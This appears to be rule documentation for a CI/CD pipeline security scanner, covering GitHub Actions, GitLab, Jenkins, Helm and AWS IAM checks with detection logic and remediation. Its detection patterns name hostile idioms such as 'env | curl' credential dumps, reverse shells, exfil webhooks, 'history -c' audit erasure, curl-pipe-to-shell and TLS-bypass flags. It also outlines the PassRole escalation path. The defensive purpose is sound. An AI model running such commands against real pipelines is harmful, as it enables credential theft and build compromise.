GHA-027: Workflow contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Distinct from the hygiene checks. GHA-016 flags curl | bash as a risky default; this rule fires only on concrete indicators, reverse shells, base64-decoded execution, known miner binaries or pool URLs, exfil-channel domains, credential-dump pipes, history-erasure commands. Categories reported: obfuscated-exec, reverse-shell, crypto-miner, exfil-channel, credential-exfil, audit-erasure.
Recommendation. Treat this as a potential pipeline compromise. Inspect the matching step(s), identify the author and the PR that introduced them, rotate any credentials the workflow has access to, and audit CloudTrail/AuditLogs for exfil. If the match is a legitimate red-team exercise, whitelist via .pipelinecheckignore with an expires: date, never a permanent suppression.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise workflows legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain
example,fixture,sample,demo, ortestare auto-suppressed; bare lines in a production workflow still fire. - Defaults to LOW confidence. Filter with
--min-confidence MEDIUMto ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: GHA-027 in the GitHub Actions provider.
GHA-028: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. If the value contains ;, &&, |, backticks, or $(), those metacharacters execute. Even when the variable source looks controlled today, relocating the script or adding a new caller can silently expose it to untrusted input.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command really must be dynamic, pass arguments as array members ("${ARGS[@]}") or validate the input against an allow-list before invocation.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool> <literal-args>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd. The rule only fires when the substituted command references a variable.
Source: GHA-028 in the GitHub Actions provider.
GL-001: Image not pinned to specific version or digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-001 in the GitLab CI provider.
GL-002: Script injection via untrusted commit/MR context HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.
Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.
Source: GL-002 in the GitLab CI provider.
GL-003: Variables contain literal secret values CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.
Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.
Source: GL-003 in the GitLab CI provider.
GL-004: Deploy job lacks manual approval or environment gate MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.
Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.
Source: GL-004 in the GitLab CI provider.
GL-005: include: pulls remote / project without pinned ref HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.
Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.
Source: GL-005 in the GitLab CI provider.
GL-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Complements GL-003 (which looks at variables: block keys). GL-008 scans every string in the pipeline against the cross-provider credential-pattern catalog, catches secrets pasted into script: bodies or environment blocks where the name-based detector can't see them.
Recommendation. Rotate the exposed credential immediately. Move the value to a protected + masked CI/CD variable and reference it by name. For cloud access prefer short-lived OIDC tokens.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: GL-008 in the GitLab CI provider.
GL-013: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in CI/CD variables can't be rotated on a fine-grained schedule. GitLab supports OIDC via id_tokens: for short-lived credential injection.
Recommendation. Use GitLab CI/CD OIDC with id_tokens: to obtain short-lived AWS credentials via sts:AssumeRoleWithWebIdentity. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from CI/CD variables.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-013 in the GitLab CI provider.
GL-014: Self-managed runner without ephemeral tag MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-managed runners that don't tear down between jobs leak filesystem and process state. The check looks for an ephemeral tag on any job whose tags: list doesn't match SaaS-only runner names.
Recommendation. Register the runner with --executor docker + --docker-pull-policy always so containers are fresh per job, and add an ephemeral tag. Alternatively use the GitLab Runner Operator with autoscaling.
Source: GL-014 in the GitLab CI provider.
GL-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: GL-016 in the GitLab CI provider.
GL-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the CI runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-017 in the GitLab CI provider.
GL-019: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: GL-019 in the GitLab CI provider.
GL-020: CI_JOB_TOKEN written to persistent storage CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detects patterns where CI_JOB_TOKEN is redirected to a file, piped through tee, or appended to dotenv/artifact paths. Persisted tokens survive the job boundary and can be read by later stages, downloaded artifacts, or cache entries, turning a scoped credential into a long-lived one.
Recommendation. Never write CI_JOB_TOKEN to files, artifacts, or dotenv reports. Use the token inline in the command that needs it and let GitLab revoke it automatically when the job finishes.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-020 in the GitLab CI provider.
GL-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-023 in the GitLab CI provider.
GL-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. cosign sign and cosign attest look similar but mean different things: the first binds identity to bytes; the second binds a structured claim (builder, source, inputs) to the artifact. SLSA Build L3 verifiers check the latter.
Recommendation. Add a job that runs cosign attest against a provenance.intoto.jsonl statement, or adopt a SLSA-aware builder (the SLSA project ships GitLab templates). Signing the artifact (GL-006) isn't enough for SLSA L3, the attestation describes how the build ran.
Source: GL-024 in the GitLab CI provider.
GL-025: Pipeline contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Fires on concrete indicators (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, env | curl credential dumps, history -c audit erasure). Orthogonal to GL-003 (curl pipe) and GL-017 (Docker insecure flags). Those flag risky defaults; this flags evidence.
Recommendation. Treat as a potential compromise. Identify the MR that added the matching job(s), rotate any credentials the pipeline can reach, and audit recent runs for outbound traffic to the matched hosts. A legitimate red-team exercise should be time-bounded via .pipelinecheckignore with expires:.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain
example,fixture,sample,demo, ortestare auto-suppressed; bare lines in a production pipeline still fire. - Defaults to LOW confidence. Filter with
--min-confidence MEDIUMto ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: GL-025 in the GitLab CI provider.
GL-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. Once a CI variable feeds into one of these idioms, any ;, &&, |, backtick, or $() in the value executes, even if the variable's source is currently trusted, future refactors may expose it.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command must be dynamic, pass arguments as array members or validate the input against an allow-list at the boundary.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: GL-026 in the GitLab CI provider.
GL-029: Manual deploy job defaults to allow_failure: true MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. This is the most common GitLab deployment gotcha: a manual deploy job looks like a gate in the UI, but the pipeline reports success on the first run because the job is marked allow_failure by default. Downstream jobs (and the overall pipeline status) proceed as though the human approved.
Recommendation. Add allow_failure: false to every deploy-like when: manual job. GitLab defaults allow_failure to true for manual jobs, which makes the pipeline report success whether or not the operator clicks, exactly the opposite of the gate you meant to add.
Source: GL-029 in the GitLab CI provider.
HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.
Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-001 in the Helm provider.
HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Three failure shapes:
Chart.yamldeclares dependencies but noChart.lockexists at all.Chart.lockexists but itsdependencies:list is missing entries declared inChart.yaml(drift after an edit without re-runninghelm dependency update).Chart.locklists every dependency but one or more entries lack adigest:field (lock generated by an old Helm 3 version that didn't always populate it).
v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.
Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download, without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts with no dependencies (the
dependencies:key is absent or empty) pass automatically. There is nothing to lock.
Source: HELM-002 in the Helm provider.
HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:
https://, chart-museum / OSS chart repos. The default for public Helm charts.oci://, registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.file://, in-repo dependency. No network surface.@alias, local alias for a previously registeredhelm repo addURL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's~/.config/helm/repositories.yaml).
Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-003 in the Helm provider.
HELM-004: Chart dependency version is a range, not an exact pin MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives, a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.
Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.
Source: HELM-004 in the Helm provider.
HELM-008: Chart.lock generated more than 90 days ago MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares against now. Fires when the delta is more than 90 days. Charts without Chart.lock are skipped. HELM-002 covers the missing-lock case directly. Charts whose generated: field is malformed or absent silently pass on this rule (HELM-002 covers the absent-lock case from a different angle).
Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.
Known false positives.
- A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with
--ignore-filewhen this matches your situation.
Source: HELM-008 in the Helm provider.
HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.
Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs against localhost are not exempted, production charts shouldn't ship references to a developer-local endpoint anyway.
Source: HELM-009 in the Helm provider.
IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.
Recommendation. Replace AdministratorAccess with least-privilege policies.
Source: IAM-001 in the AWS provider.
IAM-002: CI/CD role has wildcard Action in attached policy HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.
Recommendation. Replace wildcard actions with specific IAM actions.
Source: IAM-002 in the AWS provider.
IAM-003: CI/CD role has no permission boundary MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.
Recommendation. Attach a permissions boundary defining max permissions.
Source: IAM-003 in the AWS provider.
IAM-004: CI/CD role can PassRole to any role HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.
Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.
Source: IAM-004 in the AWS provider.
IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.
Recommendation. Add a Condition requiring sts:ExternalId for external principals.
Source: IAM-005 in the AWS provider.
IAM-006: Sensitive actions granted with wildcard Resource MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).
Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).
Source: IAM-006 in the AWS provider.
IAM-007: IAM user has access key older than 90 days HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Every user in the account is evaluated. CI/CD tooling that still uses IAM users (older Jenkins agents, GitHub Actions pre-OIDC, third-party schedulers) shows up here. The 90-day window matches the common compliance baseline; rotate sooner if the key is used from on-prem or an untrusted runner.
Recommendation. Rotate or delete IAM access keys older than 90 days. Long-lived static credentials are the #1 way compromised CI credentials get reused across environments, prefer short-lived STS tokens via OIDC federation or an assumed role.
Source: IAM-007 in the AWS provider.
IAM-008: OIDC-federated role trust policy missing audience or subject pin HIGH
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. IAM-005 already covers cross-account AWS principals. This rule targets the OIDC federation path specifically because the blast radius of a missed audience/subject pin is the entire identity provider's tenant base (e.g. all GitHub users, not just your org).
Recommendation. Every Allow statement that trusts a federated OIDC provider (token.actions.githubusercontent.com, GitLab, CircleCI, Terraform Cloud, etc.) must pin both the audience (...:aud = sts.amazonaws.com) and a subject prefix (...:sub matching repo:myorg/*). Without these, any workflow from any tenant can assume the role.
Source: IAM-008 in the AWS provider.
JF-001: Shared library not pinned to a tag or commit HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. @main, @master, @develop, no-@ref, and any non-semver / non-SHA ref are floating. Whoever controls the upstream library can ship code into your build by pushing to that branch.
Recommendation. Pin every @Library('name@<ref>') to a release tag (e.g. @v1.4.2) or a 40-char commit SHA. Configure the library in Jenkins with 'Allow default version to be overridden' disabled so a pipeline can't escape the pin.
Source: JF-001 in the Jenkins provider.
JF-002: Script step interpolates attacker-controllable env var HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. $BRANCH_NAME / $GIT_BRANCH / $TAG_NAME / $CHANGE_* are populated from SCM event metadata the attacker controls. Single-quoted Groovy strings don't interpolate so they're safe; only double-quoted / triple-double-quoted bodies are flagged.
Recommendation. Switch the affected sh/bat/powershell step to a single-quoted string (Groovy doesn't interpolate single quotes), and pass values through a quoted shell variable (sh 'echo "$BRANCH"' after withEnv([...])).
Source: JF-002 in the Jenkins provider.
JF-003: Pipeline uses agent any (no executor isolation) MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. agent any is the broadest possible executor scope, any registered executor can be picked, including ones with broader IAM / file-system access than this build needs. A compromise of one job blast-radiates across every pool.
Recommendation. Replace agent any with agent { label 'build-pool' } (targeting a labeled pool) or agent { docker { image '...' } } (ephemeral container). Reserve broad-access agents for jobs that genuinely need them.
Source: JF-003 in the Jenkins provider.
JF-004: AWS auth uses long-lived access keys via withCredentials MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Fires when BOTH a credentialsId containing aws is referenced AND an AWS key variable name appears (requires both so an OIDC role binding doesn't false-positive). Also fires when withAWS(credentials: '…') is used, the safe alternative is withAWS(role: '…').
Recommendation. Switch to the AWS plugin's IAM-role / OIDC binding (e.g. withAWS(role: 'arn:aws:iam::…:role/jenkins')) so each build assumes a short-lived role. Remove the static AWS_ACCESS_KEY_ID secret from the Jenkins credentials store once the role is in place.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-004 in the Jenkins provider.
JF-005: Deploy stage missing manual input approval MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A stage named deploy / release / publish / promote should either use the declarative input { ... } directive or call input message: ... somewhere in its body. Without one, any push that triggers the pipeline ships to the target with no human review.
Recommendation. Add an input step to every deploy-like stage (e.g. input message: 'Promote to prod?', submitter: 'releasers'). Combine with a Jenkins folder-scoped permission so only release engineers see the prompt.
Source: JF-005 in the Jenkins provider.
JF-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans the raw Jenkinsfile text against the cross-provider credential-pattern catalog. Secrets committed to Groovy source are visible in every fork and every build log.
Recommendation. Rotate the exposed credential. Move the value to a Jenkins credential and reference it via withCredentials([string(credentialsId: '…', variable: '…')]).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: JF-008 in the Jenkins provider.
JF-010: Long-lived AWS keys exposed via environment {} block HIGH 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Flags environment { AWS_ACCESS_KEY_ID = '...' } when the value is a literal or plain variable reference. Skips credentials('id') helpers and ${env.X} that resolve at runtime. Matches both multiline and inline environment { ... } forms.
Recommendation. Replace the literal with a credentials-store reference: AWS_ACCESS_KEY_ID = credentials('aws-prod-key'). Better: switch to the AWS plugin's role binding (withAWS(role: 'arn:…')) so the build assumes a short-lived role per run.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-010 in the Jenkins provider.
JF-011: Pipeline has no buildDiscarder retention policy LOW 🔧 fix
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Without a retention policy, build logs accumulate indefinitely; a secret that once leaked into a log stays visible to anyone who can read jobs. Recognises declarative options { buildDiscarder(...) }, scripted properties([buildDiscarder(...)]), and bare logRotator(...).
Recommendation. Add options { buildDiscarder(logRotator(numToKeepStr: '30', daysToKeepStr: '90')) } (declarative) or the properties([buildDiscarder(...)]) equivalent in scripted pipelines. Tune the numbers to your retention policy.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-011 in the Jenkins provider.
JF-014: Agent label missing ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Static Jenkins agents that persist between builds leak workspace files and process state. The check looks for an ephemeral substring in agent { label '...' } blocks.
Recommendation. Register Jenkins agents with ephemeral lifecycle (e.g. Kubernetes pod templates or EC2 Fleet plugin) and include ephemeral in the label string so the pipeline declares its expectation.
Known false positives.
- The check looks for the literal substring
ephemeralin the agent label. Teams that use a different convention (temp,runner-pool, org-specific ARC labels) trip the rule even when their runners are auto-scaled and ephemeral in fact. Defaults to MEDIUM confidence so CI gates can require--min-confidence HIGH.
Source: JF-014 in the Jenkins provider.
JF-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a Jenkinsfile. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: JF-016 in the Jenkins provider.
JF-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a Jenkinsfile give the container full access to the build agent, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-017 in the Jenkins provider.
JF-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck. Comments are stripped before matching.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
